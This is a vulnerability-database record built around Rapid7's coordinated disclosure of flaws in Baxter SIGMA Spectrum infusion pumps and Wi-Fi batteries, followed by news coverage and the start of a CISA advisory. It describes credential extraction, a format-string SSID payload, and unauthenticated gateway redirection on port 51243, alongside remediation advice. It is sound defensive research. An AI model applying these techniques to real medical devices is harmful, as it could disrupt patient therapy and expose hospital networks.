
Rapid7, Inc. (Rapid7) discovered vulnerabilities in two TCP/IP-enabled medical devices produced by Baxter Healthcare. The affected products are:
* SIGMA Spectrum Infusion Pump (Firmware Version 8.00.01)
* SIGMA Wi-Fi Battery (Firmware Versions 16, 17, 20 D29)
Rapid7 initially reported these issues to Baxter on April 20, 2022. Since then, members of our research team have worked alongside the vendor to discuss the impact, resolution, and a coordinated response for these vulnerabilities.
## Product description
Baxter’s SIGMA Spectrum product is a commonly used brand of infusion pumps, which are typically used by hospitals to deliver medication and nutrition directly into a patient’s circulatory system. These TCP/IP-enabled devices deliver data to healthcare providers to enable more effective, coordinated care.
## Credit
The vulnerabilities in two TCP/IP-enabled medical devices were discovered by Deral Heiland, Principal IoT Researcher at Rapid7. They are being disclosed in accordance with [Rapid7’s vulnerability disclosure policy](<https://www.rapid7.com/security/disclosure/>) after coordination with the vendor.
## Vendor statement
"In support of our mission to save and sustain lives, Baxter takes product security seriously. We are committed to working with the security researcher community to verify and respond to legitimate vulnerabilities and ask researchers to participate in our responsible reporting process. Software updates to disable Telnet and FTP (CVE-2022-26392) are in process. Software updates to address the format string attack (CVE-2022-26393) are addressed in WBM version 20D30 and all other WBM versions. Authentication is already available in Spectrum IQ (CVE-2022-26394). Instructions to erase all data and settings from WBMs and pumps before decommissioning and transferring to other facilities (CVE-2022-26390) are in process for incorporation into the Spectrum Operator’s Manual and are available in the [Baxter Security Bulletin](<https://www.baxter.com/product-security#additionalresources>)."
## Exploitation and remediation
This section details the potential for exploitation and our remediation guidance for the issues discovered and reported by Rapid7, so that defenders of this technology can gauge the impact of, and mitigations around, these issues appropriately.
## Battery units store Wi-Fi credentials (CVE-2022-26390)
Rapid7 researchers tested Spectrum battery units for vulnerabilities. We found all units that were tested store Wi-Fi credential data in non-volatile memory on the device.
When a Wi-Fi battery unit is connected to the primary infusion pump and the infusion pump is powered up, the pump will transfer the Wi-Fi credential to the battery unit.
### Exploitation
An attacker with physical access to an infusion pump could install a Wi-Fi battery unit (easily purchased on eBay), and then quickly power-cycle the infusion pump and remove the Wi-Fi battery – allowing them to walk away with critical Wi-Fi data once a unit has been disassembled and reverse-engineered.
Also, since these battery units store Wi-Fi credentials in non-volatile memory, there is a risk that when the devices are de-acquisitioned and no efforts are made to overwrite the stored data, anyone acquiring these devices on the secondary market could gain access to critical Wi-Fi credentials of the organization that de-acquisitioned the devices.
### Remediation
To mitigate this vulnerability, organizations should restrict physical access by any unauthorized personnel to the infusion pumps or associated Wi-Fi battery units.
In addition, before de-acquisitioning the battery units, batteries should be plugged into a unit with invalid or blank Wi-Fi credentials configured and the unit powered up. This will overwrite the Wi-Fi credentials stored in the non-volatile memory of the batteries. Wi-Fi must be enabled on the infusion pump unit for this overwrite to work properly.
## Format string vulnerabilities
### “Hostmessage” (CVE-2022-26392)
When running a telnet session on the Baxter Sigma Wi-Fi Battery Firmware Version 16, the command “hostmessage” is vulnerable to format string vulnerability.
**Exploitation**
An attacker could trigger this format string vulnerability by entering the following command during a telnet session:

To view the output of this format string vulnerability, `_settrace state=on` _must be enabled in the telnet session. _`set trace`_ does not need to be enabled for the format string vulnerability to be triggered, but it does need to be enabled if the output of the vulnerability is to be viewed.
Once _`set trace`_ is enabled and showing output within the telnet session screen, the output of the vulnerability can be viewed, as shown below, where each _`%x`_ returned data from the device’s process stack.

### SSID (CVE-2022-26393)
Rapid7 also found another format string vulnerability on Wi-Fi battery software version 20 D29. This vulnerability is triggered within SSID processing by the _`get_wifi_location (20)`_ command being sent via XML to the Wi-Fi battery at TCP port 51243 or UDP port 51243.

**Exploitation**
This format string vulnerability can be triggered by first setting up a Wi-Fi access point containing format string specifiers in the SSID. Next, an attacker could send a _`get_wifi_location (20)`_ command via TCP Port 51243 or UDP port 51243 to the infusion pump. This causes the device to process the SSID name of the access point nearby and trigger the exploit. The results of the triggering of format strings can be viewed with trace log output within a telnet session as shown below.

The SSID of _`AAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x`_ allows for control of 4 bytes on the stack, as shown above, using the _`%x`_ to walk the stack until it reaches 41414141. By changing the leading _`AAAA`_ in the SSID, a malicious actor could potentially use the format string injection to read and write arbitrary memory. At a minimum, using format strings of _`%s`_ and _`%n`_ could allow for a denial of service (DoS) by triggering an illegal memory read (_`%s`_) and/or illegal memory write (_`%n`_).
Note that in order to trigger this DoS effect, the attacker would need to be within normal radio range and either be on the device's network or wait for an authorized _`get_wifi_location`_ command (the latter would itself be a usual, non-default event).
**Remediation**
To prevent exploitation, organizations should restrict access to the network segments containing the infusion pumps. They should also monitor network traffic for any unauthorized host communicating over TCP and UDP port 51243 to infusion pumps. In addition, be sure to monitor Wi-Fi space for rogue access points containing format string specifiers within the SSID name.
## Unauthenticated network reconfiguration via TCP/UDP (CVE-2022-26394)
All Wi-Fi battery units tested (versions 16, 17, and 20 D29) allowed for remote unauthenticated changing of the SIGMA GW IP address. The SIGMA GW setting is used for configuring the back-end communication services for the devices operation.
### Exploitation
An attacker could accomplish a remote redirect of SIGMA GW by sending an XML command 15 to TCP or UDP port 51243. During testing, only the SIGMA GW IP was found to be remotely changeable using this command. An example of this command and associated structure is shown below:

This could be used by a malicious actor to man-in-the-middle (MitM) all the communication initiated by the infusion pump. This could lead to information leakage and/or data being manipulated by a malicious actor.
### Remediation
Organizations using SIGMA Spectrum products should restrict access to the network segments containing the infusion pumps. They should also monitor network traffic for any unauthorized host communicating over TCP and UDP port 51243 to the infusion pumps.
## UART configuration access to Wi-Fi configuration data (additional finding)
The SIGMA Spectrum infusion pump unit transmits data unencrypted to the Wi-Fi battery unit via universal asynchronous receiver-transmitter (UART). During the power-up cycle of the infusion pump, the first block of data contains the Wi-Fi configuration data. This communication contains the SSID and 64-Character hex PSK.

### Exploitation
A malicious actor with **physical access** to an infusion pump can place a communication shim between the units (i.e., the pump and the Wi-Fi battery) and capture this data during the power-up cycle of the unit.

### Remediation
To help prevent exploitation, organizations should restrict physical access by unauthorized persons to the infusion pumps and associated Wi-Fi battery units.
Note that this is merely an additional finding based on physical, hands-on access to the device. While Baxter has addressed this finding through better decommissioning advice to end users, this particular issue does not rank for its own CVE identifier, as local encryption is beyond the scope of the hardware design of the device.
## Disclosure timeline
Baxter is an exemplary medical technology company with an obvious commitment to patient and hospital safety. While medtech vulnerabilities can be tricky and expensive to work through, we're quite pleased with the responsiveness, transparency, and genuine interest shown by Baxter's product security teams.
* **April, 2022:** Issues discovered by [Deral Heiland](<https://twitter.com/Percent_X>) of Rapid7
* **Wed, April 20, 2022:** Issues reported to [Baxter product security](<https://www.baxter.com/product-security#disclosure>)
* **Wed, May 11, 2022: **Update requested from Baxter
* **Wed, Jun 1, 2022:** Teleconference with Baxter and Rapid7 presenting findings
* **Jun-Jul 2022: **Several follow up conversations and updates between Baxter and Rapid7
* **Tue, Aug 2, 2022:** Coordination tracking over [VINCE](<https://www.kb.cert.org/vince/>) and more teleconferencing involving Baxter, Rapid7, CERT/CC, and [ICS-CERT](<https://www.cisa.gov/uscert/ics/advisories>) (VU#142423)
* **Wed, Aug 31, 2022: **Final review of findings and mitigations
* **Thu Sep 8, 2022:** Baxter advisory [published](<https://www.baxter.com/product-security#additionalresources>)
* **Thu, Sep 8, 2022:** Public disclosure of these issues
* **Thu, Sep 8, 2022:** ICS-CERT [advisory published](<https://www.cisa.gov/uscert/ics/advisories/icsma-22-251-01>)
#### NEVER MISS A BLOG
Get the latest stories, expertise, and news about security today.
Subscribe
_**Additional reading:**_
* _[Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software](<https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/>)_
* _[CVE-2022-31660 and CVE-2022-31661 (FIXED): VMware Workspace ONE Access, Identity Manager, and vRealize Automation LPE](<https://www.rapid7.com/blog/post/2022/08/05/cve-2022-31660-and-cve-2022-31661-fixed-vmware-workspace-one-access-identity-manager-and-vrealize-automation-lpe/>)_
* _[QNAP Poisoned XML Command Injection (Silently Patched)](<https://www.rapid7.com/blog/post/2022/08/04/qnap-poisoned-xml-command-injection-silently-patched/>)_
* _[Primary Arms PII Disclosure via IDOR (FIXED)](<https://www.rapid7.com/blog/post/2022/08/02/primary-arms-pii-disclosure-via-idor/>)_
{"id": "RAPID7BLOG:4D69504143872C1DF22DEB73BA90A6BD", "vendorId": null, "type": "rapid7blog", "bulletinFamily": "info", "title": "Baxter SIGMA Spectrum Infusion Pumps: Multiple Vulnerabilities (FIXED)", "description": "\n\nRapid7, Inc. (Rapid7) discovered vulnerabilities in two TCP/IP-enabled medical devices produced by Baxter Healthcare. The affected products are:\n\n * SIGMA Spectrum Infusion Pump (Firmware Version 8.00.01)\n * SIGMA Wi-Fi Battery (Firmware Versions 16, 17, 20 D29)\n\nRapid7 initially reported these issues to Baxter on April 20, 2022. Since then, members of our research team have worked alongside the vendor to discuss the impact, resolution, and a coordinated response for these vulnerabilities.\n\n## Product description\n\nBaxter\u2019s SIGMA Spectrum product is a commonly used brand of infusion pumps, which are typically used by hospitals to deliver medication and nutrition directly into a patient\u2019s circulatory system. These TCP/IP-enabled devices deliver data to healthcare providers to enable more effective, coordinated care.\n\n## Credit\n\nThe vulnerabilities in two TCP/IP-enabled medical devices were discovered by Deral Heiland, Principal IoT Researcher at Rapid7. They are being disclosed in accordance with [Rapid7\u2019s vulnerability disclosure policy](<https://www.rapid7.com/security/disclosure/>) after coordination with the vendor.\n\n## Vendor statement\n\n\"In support of our mission to save and sustain lives, Baxter takes product security seriously. We are committed to working with the security researcher community to verify and respond to legitimate vulnerabilities and ask researchers to participate in our responsible reporting process. Software updates to disable Telnet and FTP (CVE-2022-26392) are in process. Software updates to address the format string attack (CVE-2022-26393) are addressed in WBM version 20D30 and all other WBM versions. Authentication is already available in Spectrum IQ (CVE-2022-26394). Instructions to erase all data and settings from WBMs and pumps before decommissioning and transferring to other facilities (CVE-2022-26390) are in process for incorporation into the Spectrum Operator\u2019s Manual and are available in the [Baxter Security Bulletin](<https://www.baxter.com/product-security#additionalresources>).\"\n\n## Exploitation and remediation\n\nThis section details the potential for exploitation and our remediation guidance for the issues discovered and reported by Rapid7, so that defenders of this technology can gauge the impact of, and mitigations around, these issues appropriately.\n\n## Battery units store Wi-Fi credentials (CVE-2022-26390)\n\nRapid7 researchers tested Spectrum battery units for vulnerabilities. We found all units that were tested store Wi-Fi credential data in non-volatile memory on the device.\n\nWhen a Wi-Fi battery unit is connected to the primary infusion pump and the infusion pump is powered up, the pump will transfer the Wi-Fi credential to the battery unit.\n\n### Exploitation\n\nAn attacker with physical access to an infusion pump could install a Wi-Fi battery unit (easily purchased on eBay), and then quickly power-cycle the infusion pump and remove the Wi-Fi battery \u2013 allowing them to walk away with critical Wi-Fi data once a unit has been disassembled and reverse-engineered.\n\nAlso, since these battery units store Wi-Fi credentials in non-volatile memory, there is a risk that when the devices are de-acquisitioned and no efforts are made to overwrite the stored data, anyone acquiring these devices on the secondary market could gain access to critical Wi-Fi credentials of the organization that de-acquisitioned the devices.\n\n### Remediation\n\nTo mitigate this vulnerability, organizations should restrict physical access by any unauthorized personnel to the infusion pumps or associated Wi-Fi battery units.\n\nIn addition, before de-acquisitioning the battery units, batteries should be plugged into a unit with invalid or blank Wi-Fi credentials configured and the unit powered up. This will overwrite the Wi-Fi credentials stored in the non-volatile memory of the batteries. Wi-Fi must be enabled on the infusion pump unit for this overwrite to work properly.\n\n## Format string vulnerabilities\n\n### \u201cHostmessage\u201d (CVE-2022-26392)\n\nWhen running a telnet session on the Baxter Sigma Wi-Fi Battery Firmware Version 16, the command \u201chostmessage\u201d is vulnerable to format string vulnerability. \n\n**Exploitation**\n\nAn attacker could trigger this format string vulnerability by entering the following command during a telnet session:\n\n\n\nTo view the output of this format string vulnerability, `_settrace state=on` _must be enabled in the telnet session. _`set trace`_ does not need to be enabled for the format string vulnerability to be triggered, but it does need to be enabled if the output of the vulnerability is to be viewed.\n\nOnce _`set trace`_ is enabled and showing output within the telnet session screen, the output of the vulnerability can be viewed, as shown below, where each _`%x`_ returned data from the device\u2019s process stack.\n\n\n\n### SSID (CVE-2022-26393)\n\nRapid7 also found another format string vulnerability on Wi-Fi battery software version 20 D29. This vulnerability is triggered within SSID processing by the _`get_wifi_location (20)`_ command being sent via XML to the Wi-Fi battery at TCP port 51243 or UDP port 51243.\n\n\n\n**Exploitation**\n\nThis format string vulnerability can be triggered by first setting up a Wi-Fi access point containing format string specifiers in the SSID. Next, an attacker could send a _`get_wifi_location (20)`_ command via TCP Port 51243 or UDP port 51243 to the infusion pump. This causes the device to process the SSID name of the access point nearby and trigger the exploit. The results of the triggering of format strings can be viewed with trace log output within a telnet session as shown below.\n\n\n\nThe SSID of _`AAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x`_ allows for control of 4 bytes on the stack, as shown above, using the _`%x`_ to walk the stack until it reaches 41414141. By changing the leading _`AAAA`_ in the SSID, a malicious actor could potentially use the format string injection to read and write arbitrary memory. At a minimum, using format strings of _`%s`_ and _`%n`_ could allow for a denial of service (DoS) by triggering an illegal memory read (_`%s`_) and/or illegal memory write (_`%n`_).\n\nNote that in order to trigger this DoS effect, the attacker would need to be within normal radio range and either be on the device's network or wait for an authorized _`get_wifi_location`_ command (the latter would itself be a usual, non-default event).\n\n**Remediation**\n\nTo prevent exploitation, organizations should restrict access to the network segments containing the infusion pumps. They should also monitor network traffic for any unauthorized host communicating over TCP and UDP port 51243 to infusion pumps. In addition, be sure to monitor Wi-Fi space for rogue access points containing format string specifiers within the SSID name.\n\n## Unauthenticated network reconfiguration via TCP/UDP (CVE-2022-26394)\n\nAll Wi-Fi battery units tested (versions 16, 17, and 20 D29) allowed for remote unauthenticated changing of the SIGMA GW IP address. The SIGMA GW setting is used for configuring the back-end communication services for the devices operation.\n\n### Exploitation\n\nAn attacker could accomplish a remote redirect of SIGMA GW by sending an XML command 15 to TCP or UDP port 51243. During testing, only the SIGMA GW IP was found to be remotely changeable using this command. An example of this command and associated structure is shown below:\n\n\n\nThis could be used by a malicious actor to man-in-the-middle (MitM) all the communication initiated by the infusion pump. This could lead to information leakage and/or data being manipulated by a malicious actor.\n\n### Remediation\n\nOrganizations using SIGMA Spectrum products should restrict access to the network segments containing the infusion pumps. They should also monitor network traffic for any unauthorized host communicating over TCP and UDP port 51243 to the infusion pumps.\n\n## UART configuration access to Wi-Fi configuration data (additional finding)\n\nThe SIGMA Spectrum infusion pump unit transmits data unencrypted to the Wi-Fi battery unit via universal asynchronous receiver-transmitter (UART). During the power-up cycle of the infusion pump, the first block of data contains the Wi-Fi configuration data. This communication contains the SSID and 64-Character hex PSK.\n\n\n\n### Exploitation\n\nA malicious actor with **physical access** to an infusion pump can place a communication shim between the units (i.e., the pump and the Wi-Fi battery) and capture this data during the power-up cycle of the unit.\n\n\n\n### Remediation \n\n\nTo help prevent exploitation, organizations should restrict physical access by unauthorized persons to the infusion pumps and associated Wi-Fi battery units.\n\nNote that this is merely an additional finding based on physical, hands-on access to the device. While Baxter has addressed this finding through better decommissioning advice to end users, this particular issue does not rank for its own CVE identifier, as local encryption is beyond the scope of the hardware design of the device.\n\n## Disclosure timeline\n\nBaxter is an exemplary medical technology company with an obvious commitment to patient and hospital safety. While medtech vulnerabilities can be tricky and expensive to work through, we're quite pleased with the responsiveness, transparency, and genuine interest shown by Baxter's product security teams.\n\n * **April, 2022:** Issues discovered by [Deral Heiland](<https://twitter.com/Percent_X>) of Rapid7\n * **Wed, April 20, 2022:** Issues reported to [Baxter product security](<https://www.baxter.com/product-security#disclosure>)\n * **Wed, May 11, 2022: **Update requested from Baxter\n * **Wed, Jun 1, 2022:** Teleconference with Baxter and Rapid7 presenting findings\n * **Jun-Jul 2022: **Several follow up conversations and updates between Baxter and Rapid7\n * **Tue, Aug 2, 2022:** Coordination tracking over [VINCE](<https://www.kb.cert.org/vince/>) and more teleconferencing involving Baxter, Rapid7, CERT/CC, and [ICS-CERT](<https://www.cisa.gov/uscert/ics/advisories>) (VU#142423)\n * **Wed, Aug 31, 2022: **Final review of findings and mitigations\n * **Thu Sep 8, 2022:** Baxter advisory [published](<https://www.baxter.com/product-security#additionalresources>)\n * **Thu, Sep 8, 2022:** Public disclosure of these issues\n * **Thu, Sep 8, 2022:** ICS-CERT [advisory published](<https://www.cisa.gov/uscert/ics/advisories/icsma-22-251-01>)\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n_**Additional reading:**_\n\n * _[Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software](<https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/>)_\n * _[CVE-2022-31660 and CVE-2022-31661 (FIXED): VMware Workspace ONE Access, Identity Manager, and vRealize Automation LPE](<https://www.rapid7.com/blog/post/2022/08/05/cve-2022-31660-and-cve-2022-31661-fixed-vmware-workspace-one-access-identity-manager-and-vrealize-automation-lpe/>)_\n * _[QNAP Poisoned XML Command Injection (Silently Patched)](<https://www.rapid7.com/blog/post/2022/08/04/qnap-poisoned-xml-command-injection-silently-patched/>)_\n * _[Primary Arms PII Disclosure via IDOR (FIXED)](<https://www.rapid7.com/blog/post/2022/08/02/primary-arms-pii-disclosure-via-idor/>)_", "published": "2022-09-08T16:30:00", "modified": "2022-09-08T16:30:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, "href": "https://blog.rapid7.com/2022/09/08/baxter-sigma-spectrum-infusion-pumps-multiple-vulnerabilities-fixed/", "reporter": "Deral Heiland", "references": [], "cvelist": ["CVE-2022-26390", "CVE-2022-26392", "CVE-2022-26393", "CVE-2022-26394", "CVE-2022-31660", "CVE-2022-31661"], "immutableFields": [], "lastseen": "2022-09-15T18:03:53", "viewCount": 28, "enchantments": {"score": {"value": 0.9, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2022-26390", "CVE-2022-26392", "CVE-2022-26393", "CVE-2022-26394", "CVE-2022-31660", "CVE-2022-31661"]}, {"type": "ics", "idList": ["ICSMA-22-251-01"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4AD7D9B99AE2ADD1CBB83E0522B03A21", "MALWAREBYTES:9E428F767EFCD8CC64A0BC77175C8151"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-LOCAL-VMWARE_WORKSPACE_ONE_ACCESS_CERTPROXY_LPE-"]}, {"type": "nessus", "idList": ["VMWARE_WORKSPACE_ONE_ACCESS_VMSA-2022-0021.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:167973"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:2C118F02F42DB14EC4F6AF30FFB72A76", "RAPID7BLOG:FBEE52CB3C438E4C42D6212E07BEFEA9"]}, {"type": "thn", "idList": ["THN:7D56D3C5E62FC42BA4A93F9D77117CCA", "THN:97305EC3B8A0058F1A01ECB0B12FBD3E"]}, {"type": "threatpost", "idList": ["THREATPOST:556939F8D58337486DFBC3B2A820DE47"]}, {"type": "vmware", "idList": ["VMSA-2022-0021", "VMSA-2022-0021.1"]}, {"type": "zdt", "idList": ["1337DAY-ID-37891"]}]}, "epss": [{"cve": "CVE-2022-26390", "epss": "0.000520000", "percentile": "0.185060000", "modified": "2023-03-19"}, {"cve": "CVE-2022-26392", "epss": "0.000490000", "percentile": "0.152580000", "modified": "2023-03-19"}, {"cve": "CVE-2022-26393", "epss": "0.000480000", "percentile": "0.150570000", "modified": "2023-03-19"}, {"cve": "CVE-2022-26394", "epss": "0.000440000", "percentile": "0.084270000", "modified": "2023-03-19"}, {"cve": "CVE-2022-31660", "epss": "0.000900000", "percentile": "0.369160000", "modified": "2023-03-19"}, {"cve": "CVE-2022-31661", "epss": "0.000420000", "percentile": "0.056360000", "modified": "2023-03-19"}], "vulnersScore": 0.9}, "_state": {"score": 1684015195, "dependencies": 1663265059, "epss": 1679305109}, "_internal": {"score_hash": "d694ad3553e92df981b3761fff88fb71"}}
{"thn": [{"lastseen": "2022-09-08T19:08:44", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgKK_E43MrCfjbQwcOmnyL8d3Gp1iIglUy_yYtGKGLw8USS-Ka5gNG25H29lTUMPGKdV1SbnsI83P_kFdHes3WafFMdPxqljmEMkmdlhNUJHGyXnI-Ee7Dr2miRbIJjoy6f85TR0lUseHhbvfmKIZm-iAB-SI9ENCySo9EGAxfzYY3n6pvnBS4seNPI/s728-e100/Infusion-pump.jpg>)\n\nMultiple security vulnerabilities have been disclosed in Baxter's internet-connected infusion pumps used by healthcare professionals in clinical environments to dispense medication to patients.\n\n\"Successful exploitation of these vulnerabilities could result in access to sensitive data and alteration of system configuration,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA) [said](<https://www.cisa.gov/uscert/ics/advisories/icsma-22-251-01>) in a coordinated advisory.\n\nInfusion pumps are internet-enabled devices used by hospitals to deliver medication and nutrition directly into a patient's circulatory system.\n\nThe four vulnerabilities in question, discovered by [cybersecurity firm Rapid7](<https://www.rapid7.com/blog/post/2022/09/08/baxter-sigma-spectrum-infusion-pumps-multiple-vulnerabilities-fixed/>) and reported to Baxter in April 2022, affect the following Sigma Spectrum Infusion systems -\n\n * Sigma Spectrum v6.x model 35700BAX\n * Sigma Spectrum v8.x model 35700BAX2\n * Baxter Spectrum IQ (v9.x) model 35700BAX3\n * Sigma Spectrum LVP v6.x Wireless Battery Modules v16, v16D38, v17, v17D19, v20D29 to v20D32, and v22D24 to v22D28\n * Sigma Spectrum LVP v8.x Wireless Battery Modules v17, v17D19, v20D29 to v20D32, and v22D24 to v22D28\n * Baxter Spectrum IQ LVP (v9.x) with Wireless Battery Modules v22D19 to v22D28\n\nThe list of flaws uncovered is below -\n\n * **CVE-2022-26390** (CVSS score: 4.2) - Storage of network credentials and patient health information (PHI) in unencrypted format\n * **CVE-2022-26392** (CVSS score: 2.1) - A [format string vulnerability](<https://owasp.org/www-community/attacks/Format_string_attack>) when running a [Telnet](<https://en.wikipedia.org/wiki/Telnet>) session\n * **CVE-2022-26393** (CVSS score: 5.0) - A format string vulnerability when processing Wi-Fi SSID information, and\n * **CVE-2022-26394** (CVSS score: 5.5) - Missing mutual authentication with the gateway server host\n\nSuccessful exploitation of the above vulnerabilities could cause a remote denial-of-service (DoS), or enable an attacker with physical access to the device to extract sensitive information or alternatively carry out adversary-in-the-middle attacks.\n\nThe vulnerabilities could further result in a \"loss of critical Wi-Fi password data, which could lead to greater network access should the network not be properly segmented,\" Deral Heiland, principal security researcher for IoT at Rapid7, told The Hacker News.\n\nBaxter, in an advisory, emphasized that the issues only affect customers who use the wireless capabilities of the Spectrum Infusion System, but also cautioned it could lead to a delay or interruption of therapy should the flaws be weaponized.\n\n\"If exploited, the vulnerabilities could result in disruption of [Wireless Battery Module] operation, disconnection of the WBM from the wireless network, alteration of the WBM's configuration, or exposure of data stored on the WBM,\" the company [said](<https://www.baxter.com/sites/g/files/ebysai3896/files/2022-09/ICSMA-22-251-01.pdf>).\n\nThe latest findings are yet another indication of how common software vulnerabilities continue to plague the medical industry, a concerning development given their potential implications affecting patient care.\n\nThat said, this is not the first time security flaws in infusion pumps have come under the scanner. Earlier this March, Palo Alto Networks Unit 42 [disclosed](<https://thehackernews.com/2022/03/report-nearly-75-of-infusion-pumps.html>) that an overwhelming majority of infusion pumps were exposed to nearly 40 known vulnerabilities, highlighting the need to secure healthcare systems from security threats.\n\nBaxter is recommending customers to ensure that all data and settings are erased from decommissioned pumps, place infusion systems behind a firewall, enforce network segmentation, and use strong wireless network security protocols to prevent unauthorized access.\n\nIt's crucial to \"implement processes and procedures to manage the de-acquisition of medical technology, [and] to assure that PII and/or configuration data such as Wi-Fi, WPA, PSK, etc., are purged from the devices prior to resale or transfer to another party,\" Heiland said.\n\n\"Maintain strong physical security within and around medical areas containing MedTech devices, as well as areas with access to a biomed network. Implement network segmentation for all biomed networks to prevent other general or business networks from communicating with MedTech devices.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-09-08T17:55:00", "type": "thn", "title": "New Vulnerabilities Reported in Baxter's Internet-Connected Infusion Pumps", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26390", "CVE-2022-26392", "CVE-2022-26393", "CVE-2022-26394"], "modified": "2022-09-08T17:55:48", "id": "THN:7D56D3C5E62FC42BA4A93F9D77117CCA", "href": "https://thehackernews.com/2022/09/new-vulnerabilities-reported-in-baxters.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-03T09:59:40", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhTOrIOL2CttCsOisd2VA2-gW84X4_vjRN0VeeVboCjatIhEmWgIzGhZkYZXyQiW0ewz7zHcj_3EwSdqRnAEPwbveJ6sP9b5SJiFO0gUhzcDnZ9z_5ucDfKC7Z8zpknqBWNLKePyknCnTPVaEsOxab4oLFhAcLQshylLe2hoOkVC6gAmgTmPpUk5AgR/s728-e100/vmware.jpg>)\n\nVirtualization services provider VMware on Tuesday shipped updates to [address 10 security flaws](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) affecting multiple products that could be abused by unauthenticated attackers to perform malicious actions.\n\nThe issues, tracked from CVE-2022-31656 through CVE-2022-31665 (CVSS scores: 4.7 - 9.8), impact VMware Workspace ONE Access, Workspace ONE Access Connector, Identity Manager, Identity Manager Connector, vRealize Automation, Cloud Foundation, and vRealize Suite Lifecycle Manager.\n\nThe most severe of the flaws is CVE-2022-31656 (CVSS score: 9.8), an authentication bypass vulnerability affecting local domain users that could be leveraged by a bad actor with network access to obtain administrative rights.\n\nAlso resolved by VMware are three remote code execution vulnerabilities (CVE-2022-31658, CVE-2022-31659, and CVE-2022-31665) related to JDBC and SQL injection that could be weaponized by an adversary with administrator and network access.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgI_LeUTMPRZAt45PycKydjnK35qzJ1vbQrYZzduBTK3pwXBSzoILVNO-NRrPV10q1CViYba9n3BFSkwCE3OiyPlBjFFKGfCsIsJrAb51zEv4pjpbI2p48W8c3Mtjx69-XrpwGlGorezClU2y2S8TfiA-6eMBO24eui8doqA0Tk1PmsxjAItUOG82gX/s728-e100/flaws.jpg>)\n\nElsewhere, it has also remediated a reflected cross-site scripting (XSS) vulnerability (CVE-2022-31663) that it said is a result of improper user sanitization, which could lead to the activation of malicious JavaScript code.\n\nRounding off the patches are three local privilege escalation bugs (CVE-2022-31660, CVE-2022-31661, and CVE-2022-31664) that permit an actor with local access to escalate privileges to \"root,\" a URL injection vulnerability (CVE-2022-31657), and a path traversal bug (CVE-2022-31662).\n\nWhile successful exploitation of CVE-2022-31657 makes it possible to redirect an authenticated user to an arbitrary domain, CVE-2022-31662 could equip an attacker to read files in an unauthorized manner.\n\nVMware said it's not aware of the exploitation of these vulnerabilities in the wild, but urged customers using the vulnerable products to [apply the patches immediately](<https://core.vmware.com/vmsa-2022-0021-questions-answers-faq>) to mitigate potential threats.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-08-03T04:49:00", "type": "thn", "title": "VMware Releases Patches for Several New Flaws Affecting Multiple Products", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T08:25:40", "id": "THN:97305EC3B8A0058F1A01ECB0B12FBD3E", "href": "https://thehackernews.com/2022/08/vmware-releases-patches-for-several-new.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "ics": [{"lastseen": "2023-06-05T15:14:33", "description": "## 1\\. EXECUTIVE SUMMARY\n\n**\\--------- Begin Update A part 1 of 3 ---------**\n\n * **CVSS v3 7.5**\n\n**\\--------- End Update A part 1 of 3 ---------**\n\n * **ATTENTION:** Exploitable remotely\n * **Vendor:** Baxter\n * **Equipment:** Sigma and Baxter Spectrum Infusion Pumps\n * **Vulnerabilities:** Missing Encryption of Sensitive Data, Use of Externally Controlled Format String, Missing Authentication for Critical Function\n\n## 2\\. UPDATE INFORMATION\n\nThis updated advisory is a follow-up to the advisory update titled ICSA-21-251-01 Baxter Sigma Spectrum Infusion Pump that was published September 8, 2022, to the ICS webpage on www.cisa.gov/uscert\n\n## 3\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could result in access to sensitive data and alteration of system configuration.\n\n## 4\\. TECHNICAL DETAILS\n\n### 4.1 AFFECTED PRODUCTS\n\nThe following versions of Sigma Spectrum Infusion systems are affected:\n\n * Sigma Spectrum v6.x model 35700BAX\n * 